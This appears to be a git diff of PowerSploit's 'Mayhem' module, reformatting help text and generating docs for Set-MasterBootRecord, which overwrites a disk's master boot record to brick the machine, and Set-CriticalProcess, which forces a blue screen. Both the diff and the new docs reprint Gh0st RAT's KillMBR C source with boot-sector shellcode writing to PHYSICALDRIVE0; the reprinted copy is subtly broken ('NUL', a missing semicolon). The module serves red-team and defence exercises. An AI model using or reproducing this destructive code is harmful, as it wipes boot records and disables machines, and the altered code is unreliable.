For ./Mayhem/ :

    -PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs

4 files changed, 391 insertions, 93 deletions

diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1
index 0baaf3e..5fbdde2 100644
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@@ -3,109 +3,109 @@ function Set-MasterBootRecord
 <#
 .SYNOPSIS
 
-    Proof of concept code that overwrites the master boot record with the
-    message of your choice.
-
-    PowerSploit Function: Set-MasterBootRecord
-    Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord  
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
+
 .DESCRIPTION
 
-    Set-MasterBootRecord is proof of concept code designed to show that it is
-    possible with PowerShell to overwrite the MBR. This technique was taken
-    from a public malware sample. This script is inteded solely as proof of
-    concept code.
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR. This technique was taken
+from a public malware sample. This script is inteded solely as proof of
+concept code.
 
 .PARAMETER BootMessage
 
-    Specifies the message that will be displayed upon making your computer a brick.
+Specifies the message that will be displayed upon making your computer a brick.
 
 .PARAMETER RebootImmediately
 
-    Reboot the machine immediately upon overwriting the MBR.
+Reboot the machine immediately upon overwriting the MBR.
 
 .PARAMETER Force
 
-    Suppress the warning prompt.
+Suppress the warning prompt.
 
 .EXAMPLE
 
-    Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
 
 .NOTES
 
-    Obviously, this will only work if you have a master boot record to
-    overwrite. This won't work if you have a GPT (GUID partition table)
-#>
+Obviously, this will only work if you have a master boot record to
+overwrite. This won't work if you have a GPT (GUID partition table).
 
-<#
 This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
 
-// CGh0stApp message handlers 
- 
-unsigned char scode[] = 
-"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
-"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
-"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
- 
-int CGh0stApp::KillMBR() 
-{ 
-	HANDLE hDevice; 
-	DWORD dwBytesWritten, dwBytesReturned; 
-	BYTE pMBR[512] = {0}; 
-	 
-	// ????MBR 
-	memcpy(pMBR, scode, sizeof(scode) - 1); 
-	pMBR[510] = 0x55; 
-	pMBR[511] = 0xAA; 
-	 
-	hDevice = CreateFile 
-		( 
-		"\\\\.\\PHYSICALDRIVE0", 
-		GENERIC_READ | GENERIC_WRITE, 
-		FILE_SHARE_READ | FILE_SHARE_WRITE, 
-		NULL, 
-		OPEN_EXISTING, 
-		0, 
-		NULL 
-		); 
-	if (hDevice == INVALID_HANDLE_VALUE) 
-		return -1; 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_LOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	// ?????? 
-	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_UNLOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	CloseHandle(hDevice); 
- 
-	ExitProcess(-1); 
-	return 0; 
-} 
+// CGh0stApp message handlers
+
+unsigned char scode[] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+	HANDLE hDevice;
+	DWORD dwBytesWritten, dwBytesReturned;
+	BYTE pMBR[512] = {0};
+
+	// ????MBR
+	memcpy(pMBR, scode, sizeof(scode) - 1);
+	pMBR[510] = 0x55;
+	pMBR[511] = 0xAA;
+
+	hDevice = CreateFile
+		(
+		"\\\\.\\PHYSICALDRIVE0",
+		GENERIC_READ | GENERIC_WRITE,
+		FILE_SHARE_READ | FILE_SHARE_WRITE,
+		NULL,
+		OPEN_EXISTING,
+		0,
+		NULL
+		);
+	if (hDevice == INVALID_HANDLE_VALUE)
+		return -1;
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_LOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NUL
+		)
+	// ??????
+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_UNLOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NULL
+		);
+	CloseHandle(hDevice);
+
+	ExitProcess(-1);
+	return 0;
+}
 #>
 
-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
         [ValidateLength(1, 479)]
         [String]
         $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
     $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
 
     # Zero-initialize the allocated unmanaged memory
-    0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
+    0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
 
     [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
 
@@ -272,11 +272,11 @@ function Set-CriticalProcess
 
 Causes your machine to blue screen upon exiting PowerShell.
 
-PowerSploit Function: Set-CriticalProcess
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Set-CriticalProcess  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .PARAMETER ExitImmediately
 
@@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
 
 #>
 
-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
         [Switch]
         $Force,
 
@@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
     {
         $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
     }
-    
+
     if (!$Response)
     {
         return
diff --git a/docs/Mayhem/Set-CriticalProcess.md b/docs/Mayhem/Set-CriticalProcess.md
new file mode 100755
index 0000000..1ec952f
--- /dev/null
+++ b/docs/Mayhem/Set-CriticalProcess.md
@@ -0,0 +1,108 @@
+# Set-CriticalProcess

+

+## SYNOPSIS

+Causes your machine to blue screen upon exiting PowerShell.

+

+PowerSploit Function: Set-CriticalProcess  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-CriticalProcess

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Set-CriticalProcess -ExitImmediately

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Set-CriticalProcess -Force -Verbose

+```

+

+## PARAMETERS

+

+### -Force

+Set the running PowerShell process as critical without asking for confirmation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExitImmediately

+Immediately exit PowerShell after successfully marking the process as critical.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WhatIf

+Shows what would happen if the cmdlet runs.

+The cmdlet is not run.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: wi

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Confirm

+Prompts you for confirmation before running the cmdlet.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: cf

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Mayhem/Set-MasterBootRecord.md b/docs/Mayhem/Set-MasterBootRecord.md
new file mode 100755
index 0000000..0aa994d
--- /dev/null
+++ b/docs/Mayhem/Set-MasterBootRecord.md
@@ -0,0 +1,184 @@
+# Set-MasterBootRecord

+

+## SYNOPSIS

+Proof of concept code that overwrites the master boot record with the

+message of your choice.

+

+PowerSploit Function: Set-MasterBootRecord  

+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]

+```

+

+## DESCRIPTION

+Set-MasterBootRecord is proof of concept code designed to show that it is

+possible with PowerShell to overwrite the MBR.

+This technique was taken

+from a public malware sample.

+This script is inteded solely as proof of

+concept code.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'

+```

+

+## PARAMETERS

+

+### -BootMessage

+Specifies the message that will be displayed upon making your computer a brick.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: Stop-Crying; Get-NewHardDrive

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RebootImmediately

+Reboot the machine immediately upon overwriting the MBR.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Force

+Suppress the warning prompt.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WhatIf

+Shows what would happen if the cmdlet runs.

+The cmdlet is not run.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: wi

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Confirm

+Prompts you for confirmation before running the cmdlet.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: cf

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+Obviously, this will only work if you have a master boot record to

+overwrite.

+This won't work if you have a GPT (GUID partition table).

+

+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):

+

+// CGh0stApp message handlers

+

+unsigned char scode\[\] =

+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"

+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"

+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

+

+int CGh0stApp::KillMBR()

+{

+	HANDLE hDevice;

+	DWORD dwBytesWritten, dwBytesReturned;

+	BYTE pMBR\[512\] = {0};

+

+	// ????MBR

+	memcpy(pMBR, scode, sizeof(scode) - 1);

+	pMBR\[510\] = 0x55;

+	pMBR\[511\] = 0xAA;

+

+	hDevice = CreateFile

+		(

+		"\\\\\\\\.\\\\PHYSICALDRIVE0",

+		GENERIC_READ | GENERIC_WRITE,

+		FILE_SHARE_READ | FILE_SHARE_WRITE,

+		NULL,

+		OPEN_EXISTING,

+		0,

+		NULL

+		);

+	if (hDevice == INVALID_HANDLE_VALUE)

+		return -1;

+	DeviceIoControl

+		(

+		hDevice,

+		FSCTL_LOCK_VOLUME,

+		NULL,

+		0,

+		NULL,

+		0,

+		&dwBytesReturned,

+		NUL

+		)

+	// ??????

+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);

+	DeviceIoControl

+		(

+		hDevice,

+		FSCTL_UNLOCK_VOLUME,

+		NULL,

+		0,

+		NULL,

+		0,

+		&dwBytesReturned,

+		NULL

+		);

+	CloseHandle(hDevice);

+

+	ExitProcess(-1);

+	return 0;

+}

+

+## RELATED LINKS

+

diff --git a/mkdocs.yml b/mkdocs.yml
index 8cc8a39..8012ab0 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -124,7 +124,11 @@ pages:
         - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
 - CodeExecution:
     - Functions:
-        - Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md'
+        - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
+        - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
+        - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
+        - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
+- Mayhem:
+    - Functions:
+        - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
+        - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'